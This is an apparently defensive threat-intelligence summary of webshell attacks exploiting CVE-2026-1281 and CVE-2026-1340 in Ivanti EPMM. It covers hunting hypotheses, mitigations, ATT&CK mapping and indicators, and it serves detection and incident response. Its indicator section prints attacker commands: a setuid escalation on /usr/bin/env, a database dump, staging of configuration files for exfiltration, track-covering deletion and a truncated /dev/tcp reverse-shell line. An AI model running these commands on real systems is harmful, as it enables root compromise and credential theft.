Ivanti EPMM Exploitation: Hit-and-Run

Key Takeaways

• Threat actors are actively exploiting CVE-2026-1281 and CVE-2026-1340 in Ivanti EPMM to deploy AntSword-based webshells.
• The attacks are highly automated, completing exploitation and data exfiltration in a matter of seconds.
• Attackers append a Java-based webshell to the '403.jsp' error page for persistence.
• Privilege escalation to root is achieved by setting the setuid bit on '/usr/bin/env'.
• Primary objectives include exfiltrating the 'mifs' database and system configuration files containing credentials.

Affected Systems

• Ivanti Endpoint Manager Mobile (EPMM)

Vulnerabilities (CVEs)

• CVE-2026-1281
• CVE-2026-1340

Attack Chain

Attackers send a crafted HTTP GET request exploiting CVE-2026-1281/CVE-2026-1340 to execute arbitrary commands. They append a base64-encoded AntSword JSP webshell to the '403.jsp' file and set the setuid bit on '/usr/bin/env' for root access. Using the webshell, they load compiled Java classes to perform reconnaissance and execute commands as root. Finally, they dump the 'mifs' database and archive system configuration files, moving them to a web-accessible directory for exfiltration before deleting the staged files.

Detection Availability

• YARA Rules: No
• Sigma Rules: No
• Snort/Suricata Rules: No
• KQL Queries: No
• Splunk SPL Queries: No
• EQL Queries: No
• Other Detection Logic: No

The article provides specific HTTP request patterns, file paths, and command lines for hunting, but does not include ready-to-use detection rules.

Detection Engineering Assessment

EDR Visibility: Medium — EDR deployment on proprietary appliances like EPMM may be limited, but if present, process creation events (e.g., mysqldump, tar) spawned by web server processes are highly visible. Network Visibility: High — The initial exploit relies on cleartext HTTP GET requests with distinct URL patterns, and the attack involves outbound reverse shells and data exfiltration over HTTP. Detection Difficulty: Moderate — While the exploit URL patterns are distinct and easy to detect, the payloads are base64-encoded, and the automated nature of the attack leaves a very small window for manual intervention.

Required Log Sources

• Web Server Access Logs
• Process Creation Logs
• File System Monitoring

Hunting Hypotheses

Hypothesis	Telemetry	ATT&CK Stage	FP Risk
Look for HTTP GET requests containing the exploit patterns '=theValue%20%20' or 'h=gPath%5B%60' in web access logs.	Web Server Access Logs	Initial Access	Low
Monitor for modifications to the '403.jsp' file in the '/mi/tomcat/webapps/mifs/' directory.	File System Monitoring	Persistence	Low
Detect web server processes (e.g., Tomcat) spawning 'mysqldump' or 'tar' commands.	Process Creation Logs	Collection	Medium
Identify the 'chmod +s' command being executed against '/usr/bin/env'.	Process Creation Logs	Privilege Escalation	Low

Control Gaps

• Lack of patching for internet-facing appliances
• Insufficient web application firewall (WAF) rules for zero-day/N-day exploits

Key Behavioral Indicators

• Webshell appended to 403.jsp
• Setuid bit on /usr/bin/env
• mysqldump execution targeting 'mifs' database

False Positive Assessment

• Low

Recommendations

Immediate Mitigation

• Apply the latest security patches from Ivanti for EPMM immediately.
• Search web access logs for the provided exploit URL patterns and attacker IPs.
• Check the integrity of /mi/tomcat/webapps/mifs/403.jsp and /usr/bin/env.

Infrastructure Hardening

• Restrict internet access to the EPMM administrative interfaces.
• Deploy a Web Application Firewall (WAF) to filter malicious GET requests.

User Protection

• Reset all credentials stored in the EPMM database if compromise is suspected.

Security Awareness

• Ensure rapid response procedures are in place for critical vulnerabilities in internet-facing appliances.

MITRE ATT&CK Mapping

• T1190 - Exploit Public-Facing Application
• T1505.003 - Server Software Component: Web Shell
• T1548.001 - Abuse Elevation Control Mechanism: Setuid and Setgid
• T1059.004 - Command and Scripting Interpreter: Unix Shell
• T1003 - OS Credential Dumping
• T1560.001 - Archive Collected Data: Archive via Utility
• T1070.004 - Indicator Removal: File Deletion

Additional IOCs

• Ips:
  • 157[.]20[.]182[.]49 - Attacker IP address
  • 62[.]84[.]168[.]208 - Attacker IP address
  • 195[.]216[.]177[.]70 - Attacker IP address
  • 194[.]35[.]226[.]128 - Attacker IP address
  • 185[.]239[.]140[.]40 - Attacker IP address
  • 64[.]226[.]156[.]242 - Attacker IP address
  • 115[.]167[.]65[.]16 - Attacker IP address
  • 46[.]34[.]44[.]66 - Attacker IP address
  • 85[.]17[.]145[.]7 - Attacker IP address
  • 46[.]151[.]182[.]30 - Attacker IP address
  • 155[.]212[.]242[.]98 - Attacker IP address
• File Paths:
  • /var/www/ext/html/tmp - Staging file for dumped mifs database.
  • /var/www/ext/html/tmpno - Staging archive for system configuration files.
  • /mi/files/system - Target directory containing sensitive configuration files archived by the attacker.
  • /usr/bin/env - System binary modified with setuid bit for privilege escalation.
• Command Lines:
  • Purpose: Privilege escalation by setting the setuid bit on env binary. | Tools: chmod | Stage: Privilege Escalation | chmod +s /usr/bin/env
  • Purpose: Dumping the EPMM database containing credentials. | Tools: mysqldump | Stage: Collection | mysqldump --databases mifs --tables
  • Purpose: Archiving sensitive system configuration files for exfiltration. | Tools: tar | Stage: Collection | tar -czvf /var/www/ext/html/tmpno /mi/files/system
  • Purpose: Removing staged exfiltration files to cover tracks. | Tools: rm | Stage: Defense Evasion | rm -f /var/www/ext/html/tmp*
  • Purpose: Initiating a reverse shell connection. | Tools: sh | Stage: Execution | /bin/sh -i >& /dev/tcp/